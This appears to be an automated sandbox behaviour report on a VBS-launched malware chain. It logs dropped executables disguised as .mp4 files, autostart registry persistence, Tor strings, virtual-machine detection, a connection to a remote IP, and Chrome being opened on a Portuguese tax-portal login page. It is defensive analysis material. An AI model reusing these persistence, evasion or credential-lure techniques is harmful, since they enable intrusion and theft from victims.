Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Users\Public\Termos\artigo.exeWindow found: window name: TEditJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: guia_luqf.vbsStatic file information: File size 4092491 > 1048576
Source: artigo.exe.0.drStatic PE information: section name: .didata
Source: artigo.exe.0.drStatic PE information: section name: .debug
Source: place.exe.5.drStatic PE information: section name: .didata
Source: place.exe.5.drStatic PE information: section name: .debug
Source: lspcv2.exe.5.drStatic PE information: section name: .didata
Source: lspcv2.exe.5.drStatic PE information: section name: .debug
Source: alphaville[1].mp4.5.drStatic PE information: section name: .didata
Source: alphaville[1].mp4.5.drStatic PE information: section name: .debug
Source: basketchampion[1].mp4.5.drStatic PE information: section name: .didata
Source: basketchampion[1].mp4.5.drStatic PE information: section name: .debug
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFE9FC pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFEA05 pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFBDA8 push ecx; retf 11_2_0000002D79CFBDA9
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFE9B4 pushad ; retf 11_2_0000002D79CFEA39
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFAD18 push ecx; retf 11_2_0000002D79CFAD19
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp4Jump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Intrumental\lspcv2.exeJump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Intrumental\place.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\Public\Termos\artigo.exeJump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp4Jump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\alphaville[1].mp4Jump to dropped file
Source: C:\Users\Public\Termos\artigo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\basketchampion[1].mp4Jump to dropped file

Boot Survival

barindex
Creates multiple autostart registry keys
Source: C:\Intrumental\lspcv2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LSPJump to behavior
Source: C:\Intrumental\place.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IplaceJump to behavior
Source: C:\Intrumental\place.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IplaceJump to behavior
Source: C:\Intrumental\place.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IplaceJump to behavior
Source: C:\Intrumental\lspcv2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LSPJump to behavior
Source: C:\Intrumental\lspcv2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LSPJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
May use the Tor software to hide its network traffic
Source: artigo.exe, 00000005.00000003.2082555406.0000020EFAC78000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000002.2976258249.0000020EFAC7F000.00000004.00000020.00020000.00000000.sdmp, place.exe, 00000008.00000000.2053768694.00000000006D1000.00000020.00000001.01000000.0000000D.sdmp, lspcv2.exe, 00000009.00000000.2126202000.0000000001E9E000.00000002.00000001.01000000.0000000E.sdmp, lspcv2.exe, 00000009.00000000.2116894129.00000000001DB000.00000020.00000001.01000000.0000000E.sdmpBinary or memory string: torConnect
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\place.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Intrumental\lspcv2.exeCode function: 11_2_0000002D79CFBB30 sldt word ptr [eax]11_2_0000002D79CFBB30
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 1531Jump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 906Jump to behavior
Source: C:\Intrumental\lspcv2.exeWindow / User API: threadDelayed 417Jump to behavior
Source: C:\Users\Public\Termos\artigo.exe TID: 8048Thread sleep time: -34007s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7520Thread sleep count: 1531 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7520Thread sleep time: -44399000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 7516Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 1608Thread sleep count: 906 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 1608Thread sleep time: -26274000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6036Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6036Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6296Thread sleep count: 417 > 30Jump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6296Thread sleep time: -12093000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6228Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Intrumental\lspcv2.exe TID: 6228Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\Public\Termos\artigo.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\place.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Intrumental\lspcv2.exeLast function: Thread delayed
Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\Public\Termos\artigo.exeThread delayed: delay time: 34007Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Intrumental\lspcv2.exeThread delayed: delay time: 30000Jump to behavior
Source: artigo.exe, 00000005.00000002.2976258249.0000020EFAC75000.00000004.00000020.00020000.00000000.sdmp, artigo.exe, 00000005.00000003.2083615098.0000020EFAC70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1824828942.000002232AA58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56
Source: wscript.exe, 00000000.00000003.1803335136.0000022321AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: artigo.exe, 00000005.00000002.2970291807.0000020EFABE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`c
Source: wscript.exe, 00000000.00000003.1803335136.0000022321AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq'\
Source: lspcv2.exe, 00000009.00000002.2978645884.00000145E2F34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exeFile created: artigo.exe.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exeNetwork Connect: 16.12.9.14 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboardJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Termos\artigo.exe "C:\users\public\Termos\artigo.exe" Jump to behavior
Source: artigo.exe, 00000005.00000000.1877254382.0000000001C94000.00000002.00000001.01000000.0000000B.sdmp, place.exe, 00000008.00000000.2060052919.00000000015E3000.00000002.00000001.01000000.0000000D.sdmp, lspcv2.exe, 00000009.00000000.2126202000.000000000149E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: _ZN6Winapi7Windows10MIIM_FTYPEE%_ZN6Winapi7Windows16HBMMENU_CALLBACKE#_ZN6Winapi7Windows14HBMMENU_SYSTEME)_ZN6Winapi7Windows20HBMMENU_MBAR_RESTOREE*_ZN6Winapi7Windows21HBMMENU_MBAR_MINIMIZEE'_ZN6Winapi7Windows18HBMMENU_MBAR_CLOSEE)_ZN6Winapi7Windows20HBMMENU_MBAR_CLOSE_DE,_ZN6Winapi7Windows23HBMMENU_MBAR_MINIMIZE_DE(_ZN6Winapi7Windows19HBMMENU_POPUP_CLOSEE*_ZN6Winapi7Windows21HBMMENU_POPUP_RESTOREE+_ZN6Winapi7Windows22HBMMENU_POPUP_MAXIMIZEE+_ZN6Winapi7Windows22HBMMENU_POPUP_MINIMIZEE%_ZTRN6Winapi7Windows14PMenuItemInfoAE%_ZTRN6Winapi7Windows14PMenuItemInfoWE'_ZTRN6Winapi7Windows16tagMENUITEMINFOAE'_ZTRN6Winapi7Windows16tagMENUITEMINFOWE%_ZN6Winapi7Windows16GMDI_USEDISABLEDE&_ZN6Winapi7Windows17GMDI_GOINTOPOPUPSE#_ZN6Winapi7Windows14TPM_LEFTBUTTONE$_ZN6Winapi7Windows15TPM_RIGHTBUTTONE"_ZN6Winapi7Windows13TPM_LEFTALIGNE$_ZN6Winapi7Windows15TPM_CENTERALIGNE#_ZN6Winapi7Windows14TPM_RIGHTALIGNE!_ZN6Winapi7Windows12TPM_TOPALIGNE%_ZN6Winapi7Windows16TPM_VCENTERALIGNE$_ZN6Winapi7Windows15TPM_BOTTOMALIGNE#_ZN6Winapi7Windows14TPM_HORIZONTALE!_ZN6Winapi7Windows12TPM_VERTICALE!_ZN6Winapi7Windows12TPM_NONOTIFYE"_ZN6Winapi7Windows13TPM_RETURNCMDE _ZN6Winapi7Windows11TPM_RECURSEE(_ZN6Winapi7Windows19TPM_HORPOSANIMATIONE(_ZN6Winapi7Windows19TPM_HORNEGANIMATIONE(_ZN6Winapi7Windows19TPM_VERPOSANIMATIONE(_ZN6Winapi7Windows19TPM_VERNEGANIMATIONE$_ZN6Winapi7Windows15TPM_NOANIMATIONE"_ZN6Winapi7Windows13TPM_LAYOUTRTLE!_ZN6Winapi7Windows12TPM_WORKAREAE"_ZTRN6Winapi7Windows11PDropStructE$_ZTRN6Winapi7Windows13tagDROPSTRUCTE#_ZN6Winapi7Windows14DOF_EXECUTABLEE!_ZN6Winapi7Windows12DOF_DOCUMENTE"_ZN6Winapi7Windows13DOF_DIRECTORYE!_ZN6Winapi7Windows12DOF_MULTIPLEE _ZN6Winapi7Windows11DOF_PROGMANE"_ZN6Winapi7Windows13DOF_SHELLDATAE _ZN6Winapi7Windows11DO_DROPFILEE!_ZN6Winapi7Windows12DO_PRINTFILEE
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmp, place.exe, 00000008.00000002.2972396912.000001477F554000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: artigo.exe, 00000005.00000000.1877254382.0000000001C94000.00000002.00000001.01000000.0000000B.sdmp, place.exe, 00000008.00000000.2060052919.00000000015E3000.00000002.00000001.01000000.0000000D.sdmp, lspcv2.exe, 00000009.00000000.2126202000.000000000149E000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: _ZN6Winapi7Windows11DOF_PROGMANE
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Managerq
Source: place.exe, 00000008.00000002.2972396912.000001477F55C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\Public\Termos.zip VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Intrumental\lspcv2.exeQueries volume information: C:\ VolumeInformationJump to behavior
